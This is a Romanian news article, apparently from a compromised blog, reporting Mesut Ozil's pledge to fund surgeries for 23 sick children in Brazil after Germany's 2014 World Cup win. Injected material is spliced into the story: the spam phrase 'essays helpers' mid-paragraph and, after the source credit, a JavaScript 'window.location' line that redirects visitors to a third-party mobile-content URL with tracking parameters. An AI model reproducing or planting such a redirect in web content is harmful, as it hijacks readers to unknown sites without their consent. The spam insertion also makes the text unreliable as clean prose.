Gest minunat al lui Mesut Ozil. Va plăti operațiile a 23 de copii bolnavi din Brazilia

ozil

 

Mijlocașul german anunțase, înaintea startului Cupei Mondiale, pe care nemții au câștigat-o, că va sponsoriza 11 intervenții chirurgicale suferite de copii în Brazilia. După victorie, Ozil a anunțat că va încerca să facă mai mult. essays helpers

Mesut Ozil a făcut un nou anunț, de curând, în care a spus că va ajuta 23 de copii, câte unul pentru fiecare component al naționalei Germaniei, gestul fiind menit să mulțumească Braziliei pentru ospitalitatea din timpul turneului final.

”Înainte de startul Cupei Mondiale, am ajutat 11 copii bolnavi. Cum victoria reușită la turneul final din Brazilia nu este doar meritul a 11 jucători, ci a întregii echipe, voi crește numărul la 23. Acesta este felul meu de a le mulțumi brazilienilor pentru ospitalitate”, a spus Ozil.

Fiecare jucător german va primi un bonus de 300.000 de euro pentru triumful din finala cu Argentina, scor 1-0, după prelungiri, pe ”Maracana”.

Ozil și colegii săi au distrus naționala Braziliei, cu scorul de 7-1, în semifinale, însă gestul său de acum poate aduce multă fericire pentru câțiva copii.

Sursa: www.yahoo.ro

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *